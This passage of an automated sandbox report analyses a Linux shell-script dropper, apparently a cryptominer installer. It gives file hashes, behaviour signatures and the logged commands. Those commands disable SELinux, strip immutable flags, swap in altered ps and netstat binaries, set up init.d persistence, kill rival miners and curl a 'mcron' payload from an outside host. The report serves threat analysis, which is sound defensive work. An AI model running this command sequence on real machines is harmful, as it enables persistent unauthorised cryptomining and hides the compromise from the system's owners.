SHA256 ff9fe5260a3acc455c3c52f7812b167d7f3010ad24bcf23c0f4bed6eee92bbb2
SHA512 655cafe8366a5e3327a1335c18af3c00fa6fdfef0ec5d3e2aa46634272842abd89732b59705ec291f5ccc2fdfa2412e1bf0dadc809958e8672180e1abf2be076

/etc/init.d/seduA5xv0

MD5 ec9a7d183ec50837a12aca3f9c95cc27
SHA1 396a23fa1d6e8a871d69786d14fd1ce4e4cba583
SHA256 c82a6b52fad02e7f7e33184a9b917fe966b20eb6afce27fb3b8c6e799f8df8a0
SHA512 ec1f384a5bc7e2a67b99838644346ea1391b5b75e7bcc1a1ea6d59f07418da7553175c8f43869ff352c0b7aa80cb26ccdc5f42c3dde9029917cebc520a19e85b

/etc/init.d/sedPHaP3Z

MD5 a9ad994be904ef8c646c6044e01cb30a
SHA1 2e87087451b7e04f64209d66c25ae1c12ab25f49
SHA256 f90e0e478d4343071c2367319db5145621924b293bd81da4310abd22ff4ceb3f
SHA512 d9bffc5c302126b65e32f34c564f2b5c5e28705a196ae8e50ba7583e7c3849d76d98cc024ed5faa805f921479a425e1bca06f1c49106be78a01f94c790b7cfbb

/etc/init.d/sedivgDd0

MD5 9932c03664a6acd9f23afdbcf91478cb
SHA1 73b78fcd63c788f1a977c604a760eae6f8f60881
SHA256 1711fba8077fe12a1db8f26e0f06f32ee06921029deb0be773368878e135832a
SHA512 7a0432d9a5da508df34691091a0de13a4c009a5ec9d479eb5b55bde2d3e5c3fad1f0fa423a67b618246e5af83c163da52b49908a772b7a499f2cbec23e5229d2

/etc/init.d/sed9jkXc4

MD5 561b38cf0171ef9aa41954dad9ec6b3c
SHA1 93db75a3b83ab12a3cd8859d5417e8ba036f0241
SHA256 6b0c5c1234b1f749b4af91bc9bbbd9989d98b267fae416a495891937e010c67b
SHA512 2b0f9eb9fde3f7a8f8d3ff286acfc034d5c046da789ed25ce29540b8ca89b6fb86cf44c6d8823423d9515dc20400f49016676c4a940640a2384bb87902e125d1

/etc/init.d/sedItU9o3

MD5 1ca5c0743fa797ffa364db95bb8d8d8e
SHA1 6de496930dfe00e705fa244d77e7dfa2d1c6aef8
SHA256 a919f9434b681974a2f1d4120af10c0527b30e8cda6fdec1dea1eee3077b6609
SHA512 044c6136b2085066e71f15a942b341c54fcfe97f754a10d6e91971c150214e9be014cb96e83d8ae4dee51129f5b44a41c663598f9430e9c4cc93f5675b625b5f

/etc/init.d/sed7uNT72

MD5 341bea96d3abe6f0dd2a67af3442fbc6
SHA1 0b2afe13ecb26b68db5b4227fd56c93a87cbc5db
SHA256 30796f5c362f7c7503e7dec44c7bf66ae9f9949c087f094cb946439480648136
SHA512 4c6747ff899b8e5b101cd58b29094a59627f2466376835856b5425abfd832617ee13eb50b70cf2d7fb09e2957726acd0a3a985a358dd3bf637e52a0fd689779d

/etc/init.d/sedIOKVd3

MD5 2e43c47bae9d14535654c575776a3d69
SHA1 1d6838ee128ed25b278ce57d23a3eacf27c3e3aa
SHA256 f6421e3b8d3a526047f8f613af03493ec5cb2cee15bac760385bd658a5a86497
SHA512 0531a9ba9646cf97eae0028ac9ac273dda5cf7cb7ff95d2c079d2dacd80e99a72fb1cc5106171a3f1fa2cacc8120fc30a557aab8bca4e0ffba6890e958f61013

/etc/init.d/sedHcZzv2

MD5 b868200c6e36ef87e27ead9a3ddad2db
SHA1 b1cc85e63d4302b020a4679971b6c363c9392d63
SHA256 5895801d6256ce6c2a65760e01db8ffd8b90a9bf80294e9a358423b3d4ce59d1
SHA512 f3dba21b0bb340c4742e5facd042180d66541010cc25f00e223cf545a78550184571951f5ac6c7c35a3840d08a6a07f89e78316c9f7cb65108c0558c3a5e9d0a

/etc/init.d/sed4AVVs6

MD5 82698019c962069b438bd2a82d9fa1e7
SHA1 2ad758cc8614f4c8368e8e7eb71b92f0ff2e8305
SHA256 65044cf080c0edd9bd6ba75e1a8e8d0f300930d590257c6d6ce28273899ad4a7
SHA512 dd64cd1f33f2cf09867363234e6791a3ebc3697aaef0d659e8e354c52fa9c4fc1c013369b28a42a831552eb888e2635e9a5d77c6619691af097c9fd2e4f0e9a9

/etc/init.d/sedVHPgf6

MD5 27013efdfe13470845c70a9e00a61fde
SHA1 2b840ac1a1d1b866ba457bd0746144c431e944ad
SHA256 c02921f45d52f6e5f324cc2cdd3cb9a00198a5b5e979cc501b16eec6a786e7f0
SHA512 0fd9e4da5dc1702970cc7b05fff801784ddeebb772f0f3b49b2e034a4927eabef1d5864345687d16388a1d59b71e7b4628978dcbdf113577413130a73d181b1d

/etc/init.d/sedqSWgm6

MD5 84d429bf52701edbd6535020d8dcebd1
SHA1 d4070380d612001c0acf1abba7d685b1b13ec520
SHA256 49272b0c0e7f45878a80e5918f571e0ba40c03448a6617b1cdfe5d70b212c845
SHA512 cfa58a71d870ce9b6a4a8be75b19670d78dfcc8cdee5489fb098f7f00a05efb72d7c92895189932088e9c2713d600a6fa7cb7a4f9edba5bd768ce6bc811fb09a

/etc/init.d/sedFhHFT5

MD5 7603d0f581e54fdbe31ad62cbb4cfd22
SHA1 3f9c40e180498da01e426ffb72a31b876e1869fc
SHA256 8b9ff7abb9fffe88c146471c36494d98d5a114aef3e298db8314b31d9e15a881
SHA512 1a98ccdadde843e6a17c97b9f5182d94cc1250d8161adc29288228d727e5c79b06aa823a3637a1489b74c32a73b643ba4355e07f5e7aba61fa8174ae1b917ded

/etc/init.d/sed6ZnCQ4

MD5 0f1be14b21796a952e115c03a86787e0
SHA1 1d25f0167fc186ce422a03dafbdf05a9994950bc
SHA256 d5345e824e0865f6f5615d8602e9141bcec1942549b3ef8792bfc17746998c84
SHA512 670fd1216b5863f26a71a939f5f072b664674acf250a87aef8b2af06aa3525cf72e256ab4507b2c5d68656c01f23bad2d28889f30117fc6b0fc07a1843baaff5

/etc/init.d/sedHZKD74

MD5 4ed1a6fd54897767efb2cfef6062e376
SHA1 a97d0e6f607c40f1f9b568b574c4d3b3141d7d79
SHA256 33213290a470b25b03b9cc9e16ccdd2cdd7991b795a1f59e277626b909bb42d4
SHA512 c4e79cd2ba8ad768a299b29bbfce3e35bd8a0172f47d89d9fb4e75aaf67bb1eae3772b4988daeb8d9dff1e9e9b7024d2973162e58858845f5170ca55bf0d660b

/etc/init.d/sedSqez28

MD5 49fbfd237be2a2f09576f1f9374580be
SHA1 e380716a856a90f5643ddd6f3655020fc2f603dd
SHA256 69219f70b7b70dacbce2f4a0fd9b2f7ac05623a285ae7abf1e798fdb72fac02e
SHA512 b6f37481d2397b79fa47e23435626166c9857a78d19b755703e867b7401fa066122d898b4d303c6629d154bd1ed19f486146878ff5fafbe1e020e821c4835cea

/etc/init.d/sedBeMLr8

MD5 c5d89677f904551f5b192f35ad98d73c
SHA1 855933c89b14174a8464633fc24e0867f5927cde
SHA256 0f4cd7733d737a110b8a48c46582ab2f88da69d32b47cffeec948f75daa0232f
SHA512 62301cd1cef7801c41f5dbc58daa0c8167d8a9aa9c1c05cf190cd8f834a872e27fd28825f23edd6a3a8a5879d4c8a8409580d4449c807651a95f6f205eeda103

/etc/init.d/sedWFScV8

MD5 bd41a0654a192d74dfb9c551b06fa855
SHA1 08e34ce46a988013dd451e21178a517388a02101
SHA256 98307d07a6e740050c06fcc3f7f95320d8865d73f6b95ac903e3dfccdbcf81f8
SHA512 d3c2a56eb76a32554b987c5a6a7e84a5780041c9f54682052bbb94e217af84c11f65827749171f457cf14c733719ad090511f606ee4afee1aabc9e966ec9b849

/etc/init.d/sedpoTtb8

MD5 0e7858707b622c18dbd8dd8e39303c44
SHA1 d39af3eea63f2f5d001491d1f0f11e6f171c6b1d
SHA256 dc7e0cbeec303c02cc4da4dcd19fdf749a7824b52d5f891f52484f1551ac9f5d
SHA512 88a2b42925fe8c2082de8b03fe218bcc848488653ecd9c8eca43ddf9906c39566a8a845fcfe32b0056bced5a4c76cb6d908a1c772a679cac18cd631e723fa419

/etc/init.d/sedEGBpj7

MD5 f1efa76005a42f5d6736dfb2f7fda02e
SHA1 fbb0fa9c5073732a1c69d3349534c380fa13ffc9
SHA256 70637da86bb196291f687c0e8b2276dd92b1d8e1b7fe6a4b507ce90e5a74fd4c
SHA512 211b78fe6a71b212847a139583cbb8fb99adb453d85a0d35a752e54d22d60c5392273637d96ad3dead5afb4148589eafc3c41ad6f871abb2bb9eb5ee2e4d8bfc

/etc/init.d/sedniYnE7

MD5 2f220a9e28aaf30a8250410622599d53
SHA1 6f8f0a918c62a5ce8129ff479f5ded293cba34d9
SHA256 026f26971b2fc4221ab1c30af5ebc61b0b07042bd2ddc98c470b8d897f38119f
SHA512 5895ee7345ea1dc3849362beb997ff29a14e6a005c697376f9629855956fee7b35d35ac76070d39a1e357dd2ea887f5c74646eb9c1eecf7a3a685fa98545a072

/etc/init.d/sed6AQ9Lb

MD5 a2fba832eab9066d85f27ee56ac9fad4
SHA1 1a52a8f623f7fdb8e2bbc2f8d4034677be09e117
SHA256 f123397655c0e07f05204406a387b15213cdc1fd5369b7313f5f79ea564c010a
SHA512 d5a0742c684b24031b4c7dcd039eb28f61d7e764cd014d1e015bb7d099d1a665dc3b1232208c5b927e5ace79c111f1e159892b0a6c4bd4c33018d0e7792a73d1

/etc/init.d/sedxP3LUa

MD5 64d52dbd33144a38e8d4a837f6cec726
SHA1 f036ecda9f5273ad153d09c9e36a72f68a7bdbba
SHA256 c4759ed3515fdf2b109d8d42f9d0e258eb6a47051183b13d06f3cf9a180e3298
SHA512 3f473644d1f85053d07c87dbc3ae6a06587faa340c5e954f0a9e4b8f76e714f26324b9017ebc82041f32db32453197fa21c3467f0f91cf41f3726f928f05e51c

/etc/init.d/sedAPrblb

MD5 c7723dd7bb64ea6711974e3fd584c81c
SHA1 d8a8cbd79aee3b80b9493958e480e1763c59eac1
SHA256 4018b896571176b9a625404cd89e402ca876b2a754073f1d4802cc59c01ef981
SHA512 493f4fdb0a523e3e8c41e82359f6e932d837d414e30da0fb05699fdd14470fc71f8d6d0a3f2ca85f12a847637a7107034338e4c0f5c3b2ce2efe12a8d4d9b90e

/etc/init.d/sedpxfBNa

MD5 4156943ab8a824fcf4b04cc1362eb230
SHA1 f70925b017b133e308dd28655aecb7a355e03940
SHA256 619b2c1d55f37ff0e5bedd273d0d13becb54400227dc60e7f544e5a02f7630b1
SHA512 aa43089c6a5d70f84349e8cb5183c2dce76894c4b14844f064392876bca422681b6d9d91c1528028db7a2c334c74cc38ae0855b31f7ea9d4cb58b558f2dc0a25

/etc/init.d/sedkz6RZ9

MD5 290829a5efc55b7c435de0bb769f217b
SHA1 58663cd782ebfd62cfd1dbc05101767f1cddae46
SHA256 c30f6bd228f6a19050e80727800f3e848b99005e2e3c54ff6e210bab4093e449
SHA512 3703dad2b8a8eade00c4bbe54b774dd35562877cbb475cf04c7bca96a5421129dfe95b82df692e7fb415a5e0319eb831a55149eda7e953816aaa88ebb2c2a27a

/etc/init.d/sed0GUKie

MD5 29b6e6ae2de1365c06806e18f18d8fab
SHA1 2d0509721648303a8bac612273c63c938fe8e253
SHA256 4b93a446c6094a1ea265699d794171f358ea611d974eae6f728652c81e3df6ad
SHA512 3555a9c2be5953f2de10f06f65c45252e2fc9a7c769a15d80a5cc7652bb1ffc8797be2567bf19efe2fc23175b21021d51b9fe25556b0e13076e3afdc9b7c7693

/etc/init.d/sedZQsazd

MD5 a1f3d5bd15f8b85ab00fbcb827c0f0c4
SHA1 4a4ef62a4c2397bc70eac13898145939569268a0
SHA256 963c10b500751772551368cfa5496de7f199fa217445f27a1258aa9fde1ba53c
SHA512 eef2cea41785a972b586d63fc56dbe40c5d3a09387ffd929d311577c5bd861ad73a6e561b011a7dad61dee6c23f35a081cd298579dbbb5fbb20057a7d98ee9ac

/etc/init.d/sedQvKbJd

MD5 4bf46072f9f13b2e38d58a053def37d5
SHA1 94e4b56f7a5d40a40f256a474e244642ad778a4e
SHA256 a6ef18d6a1b3f33cb3df0dce41759bda88e3133d249e6c13848fb0a007654cbf
SHA512 0ffe565c26cf1585a0d26f47328fca2d886fc33b43537f4674d0f13d6eee3f39775fa0115e8b3606148665807540244e517d7c10130c161e7191172a76a031de

/tmp/sh-thd.BubyqF

MD5 2ff9930962f5ed39a68bfabddc3551ac
SHA1 9f99fbefee4a609f403025ed510c2fa93982303b
SHA256 d00546c6e26a2f1e7c7ae24a5173fb58b3d7e060d4920b7a7ba772bc76e956f7
SHA512 6b6cd3c027e2b1b3b19519a413b96f15d4dc5579f30b61919e1ab7f2e1273141dec54d8b21cf49a8b89815d3cd9694354788a13ec651e0479eb70a53f576d1df

/etc/init.d/crontabs

MD5 f21f5717d956b60f695d350bbab05716
SHA1 1155f2cf27dc56f0e981ab78517dbf6d1b45d72f
SHA256 c19b0543ff2a66484d54268c27defcd2a8d5b9ac26e267c73dace034ac21931e
SHA512 2bdf31983a48991dc7de0c2d25cb97a032fc6fd29fe1534536b9e910504a6d1317d83c935ad92bab979065da81f4f2c6218b7d2f5df31ffcc8190952a49e9ba2

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 23:20

Reported

2024-11-13 23:23

Platform

debian9-armhf-20240418-en

Max time kernel

149s

Max time network

13s

Command Line

[/tmp/HMtWYpJGZVUZkrQK.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Abuse Elevation Control Mechanism: Sudo and Sudo Caching

privilege_escalation defense_evasion
Description Indicator Process Target
N/A N/A /bin/sed N/A

Attempts to change immutable files

Description Indicator Process Target
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /usr/bin/chattr N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A
N/A N/A /bin/sed N/A

Disables SELinux

defense_evasion
Description Indicator Process Target
N/A N/A /usr/sbin/setenforce N/A

Enumerates running processes

Modifies init.d

persistence
Description Indicator Process Target
File opened for modification /etc/init.d/sedxXliUx /bin/sed N/A
File opened for modification /etc/init.d/sedxJDWUg /bin/sed N/A
File opened for modification /etc/init.d/selinux /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/crontabs /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /etc/init.d/sedXptBrl /bin/sed N/A
File opened for modification /etc/init.d/sedqz14Ln /bin/sed N/A
File opened for modification /etc/init.d/sedQAct27 /bin/sed N/A
File opened for modification /etc/init.d/sedjSL3gO /bin/sed N/A
File opened for modification /etc/init.d/sed1G2Nou /bin/sed N/A
File opened for modification /etc/init.d/sedKYm7AI /bin/sed N/A
File opened for modification /etc/init.d/sedkEQzHQ /bin/sed N/A
File opened for modification /etc/init.d/sedO2yYB2 /bin/sed N/A
File opened for modification /etc/init.d/sed3w2aIn /bin/sed N/A
File opened for modification /etc/init.d/sedAWxBX7 /bin/sed N/A
File opened for modification /etc/init.d/sed4Pejsj /bin/sed N/A
File opened for modification /etc/init.d/sedshh05b /bin/sed N/A
File opened for modification /etc/init.d/sedNfkxxe /bin/sed N/A
File opened for modification /etc/init.d/sedEf5nzK /bin/sed N/A
File opened for modification /etc/init.d/sedJgobeX /bin/sed N/A
File opened for modification /etc/init.d/sedQjVLAv /bin/sed N/A

Checks CPU configuration

antivm
Description Indicator Process Target
File opened for reading /proc/cpuinfo /usr/bin/curl N/A

Reads CPU attributes

discovery
Description Indicator Process Target
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A
File opened for reading /sys/devices/system/cpu/online /usr/bin/pkill N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/267/status /usr/bin/pkill N/A
File opened for reading /proc/678/cmdline /usr/bin/pkill N/A
File opened for reading /proc/18/status /usr/bin/pkill N/A
File opened for reading /proc/11/cmdline /usr/bin/pkill N/A
File opened for reading /proc/29/status /usr/bin/pkill N/A
File opened for reading /proc/317/status /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/19/status /usr/bin/pkill N/A
File opened for reading /proc/42/status /usr/bin/pkill N/A
File opened for reading /proc/217/cmdline /usr/bin/pkill N/A
File opened for reading /proc/647/cmdline /usr/bin/pkill N/A
File opened for reading /proc/6/status /usr/bin/pkill N/A
File opened for reading /proc/12/cmdline /usr/bin/pkill N/A
File opened for reading /proc/9/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/cmdline /usr/bin/pkill N/A
File opened for reading /proc/308/cmdline /usr/bin/pkill N/A
File opened for reading /proc/22/cmdline /usr/bin/pkill N/A
File opened for reading /proc/152/cmdline /usr/bin/pkill N/A
File opened for reading /proc/7/status /usr/bin/pkill N/A
File opened for reading /proc/308/cmdline /usr/bin/pkill N/A
File opened for reading /proc/595/status /usr/bin/pkill N/A
File opened for reading /proc/641/cmdline /usr/bin/pkill N/A
File opened for reading /proc/43/cmdline /usr/bin/pkill N/A
File opened for reading /proc/27/status /usr/bin/pkill N/A
File opened for reading /proc/317/cmdline /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/find N/A
File opened for reading /proc/6/cmdline /usr/bin/pkill N/A
File opened for reading /proc/318/status /usr/bin/pkill N/A
File opened for reading /proc/142/cmdline /usr/bin/pkill N/A
File opened for reading /proc/304/cmdline /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/filesystems /usr/bin/find N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/304/status /usr/bin/pkill N/A
File opened for reading /proc/20/cmdline /usr/bin/pkill N/A
File opened for reading /proc/2/status /usr/bin/pkill N/A
File opened for reading /proc/27/status /usr/bin/pkill N/A
File opened for reading /proc/748/cmdline /usr/bin/pkill N/A
File opened for reading /proc/269/cmdline /usr/bin/pkill N/A
File opened for reading /proc/5/status /usr/bin/pkill N/A
File opened for reading /proc/110/status /usr/bin/pkill N/A
File opened for reading /proc/640/status /usr/bin/pkill N/A
File opened for reading /proc/635/cmdline /usr/bin/pkill N/A
File opened for reading /proc/143/status /usr/bin/pkill N/A
File opened for reading /proc/2/status /usr/bin/pkill N/A
File opened for reading /proc/12/status /usr/bin/pkill N/A
File opened for reading /proc/143/cmdline /usr/bin/pkill N/A
File opened for reading /proc/678/cmdline /usr/bin/pkill N/A
File opened for reading /proc/319/cmdline /usr/bin/pkill N/A
File opened for reading /proc/19/cmdline /usr/bin/pkill N/A
File opened for reading /proc/267/status /usr/bin/pkill N/A
File opened for reading /proc/642/cmdline /usr/bin/pkill N/A
File opened for reading /proc/28/cmdline /usr/bin/pkill N/A
File opened for reading /proc/269/status /usr/bin/pkill N/A
File opened for reading /proc/757/status /usr/bin/pkill N/A
File opened for reading /proc/15/status /usr/bin/pkill N/A
File opened for reading /proc/636/status /usr/bin/pkill N/A
File opened for reading /proc/273/cmdline /usr/bin/pkill N/A
File opened for reading /proc/268/status /usr/bin/pkill N/A
File opened for reading /proc/43/cmdline /usr/bin/pkill N/A
File opened for reading /proc/647/status /usr/bin/pkill N/A
File opened for reading /proc/318/cmdline /usr/bin/pkill N/A
File opened for reading /proc/3/status /usr/bin/pkill N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/sh-thd.QtKxCq /tmp/HMtWYpJGZVUZkrQK.sh N/A
File opened for modification /tmp/sh-thd.JBfcky /tmp/HMtWYpJGZVUZkrQK.sh N/A

Processes

/tmp/HMtWYpJGZVUZkrQK.sh

[/tmp/HMtWYpJGZVUZkrQK.sh]

/usr/sbin/setenforce

[setenforce 0]

/usr/bin/find

[find / -maxdepth 1 -name *.mod]

/usr/bin/chattr

[chattr -ia /bin/ps]

/usr/bin/chattr

[chattr -ia /usr/bin]

/usr/bin/chattr

[chattr -ia /etc/crontab]

/bin/cp

[cp -f /usr/bin/dpkgd/ps /usr/bin/ps]

/bin/cp

[cp -f /usr/bin/dpkgd/netstat /usr/bin/netstat]

/bin/cp

[cp -f /usr/bin/dpkgd/lsof /usr/bin/lsof]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/crontab]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/alsa-utils]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/atd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/auditd]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/console-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/cron]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/dbus]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/exim4]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/hwclock.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/keyboard-setup.sh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/kmod]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/networking]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/procps]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/rsyslog]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/selinux-autorelabel]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/ssh]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/sudo]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/udev]

/bin/sed

[sed -i -E /system\.mark/d;/system\.pub/d;/libgdi\.so\.0\.8\.2/d;/bash\.cfg/d;/netstat\.cfg/d;/\.mod/d; /etc/init.d/x11-common]

/bin/mount

[mount]

/bin/grep

[grep -o /proc/[0-9]\+]

/usr/bin/sort

[sort -u]

/usr/bin/find

[find /etc/rc1.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc1.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc2.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc3.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc4.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *selinux* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *VsystemsshMdt* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *crontabs* -exec rm -f {} +]

/usr/bin/find

[find /etc/rc5.d/ -name *dns-udp4* -exec rm -f {} +]

/usr/bin/pkill

[pkill awk]

/usr/bin/pkill

[pkill gurb]

/usr/bin/pkill

[pkill pythno]

/usr/bin/pkill

[pkill pythno3]

/usr/bin/pkill

[pkill pythno3.1]

/usr/bin/pkill

[pkill knerl]

/usr/bin/pkill

[pkill system.mark]

/usr/bin/pkill

[pkill system.pub]

/usr/bin/pkill

[pkill netstat.cfg]

/usr/bin/pkill

[pkill bash.cfg]

/usr/bin/pkill

[pkill libgdi.so.0.8.2]

/usr/bin/pkill

[pkill kernel]

/usr/bin/pkill

[pkill linkid]

/usr/bin/pkill

[pkill mcron]

/usr/bin/pkill

[pkill xmrig]

/usr/bin/pkill

[pkill initd]

/bin/cat

[cat]

/bin/cat

[cat]

/bin/chmod

[chmod 755 /etc/init.d/selinux /etc/init.d/crontabs]

/usr/bin/chattr

[chattr +ia /etc/init.d/selinux /etc/init.d/crontabs]

/bin/mkdir

[mkdir -p /usr/bin/bsd-port /usr/local/sbin]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc2.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc3.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc4.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/selinux /etc/rc5.d/S99selinux]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc2.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc3.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc4.d/S90crontabs]

/bin/ln

[ln -fs /etc/init.d/crontabs /etc/rc5.d/S90crontabs]

/usr/bin/curl

[curl -fsSL http://0889.org/aegis/mcron-vip-1 -o /usr/local/sbin/mcron]

Network

Country Destination Domain Proto
US 1.1.1.1:53 0889.org udp

Files

/etc/sed7Dcv7Z

MD5 8f111d100ea459f68d333d63a8ef2205
SHA1 077ca9c46a964de67c0f7765745d5c6f9e2065c3
SHA256 0e5c204385b21e15b031c83f37212bf5a4ee77b51762b7b54bd6ad973ebdf354
SHA512 d81767b47fb84aaf435f930356ded574ee9825ec710a2e7c26074860d8a385741d65572740137b6f9686c285a32e2951ca933393b266746988f1737aad059adb

/etc/init.d/sedshh05b

MD5 9b392bac8c24330ad47478a5038ead13
SHA1 6c3050598d168c42dc688cecb77fe478211c3ab9
SHA256 d054fee005a1aa4363200512769a6aef7aad68fc4c9947b8f8c417615727f07f
SHA512 2a4da94b1f58ce1e3dab46a9e32417da710d9049028858cca0a0003305c38658f9bbe0b06ec04cdea26cab02fbd0a9fe44f36e277c087bdbf66763e6bc0f7462

/etc/init.d/sedXptBrl

MD5 ce2de503acc3de02f544571e89d4d717
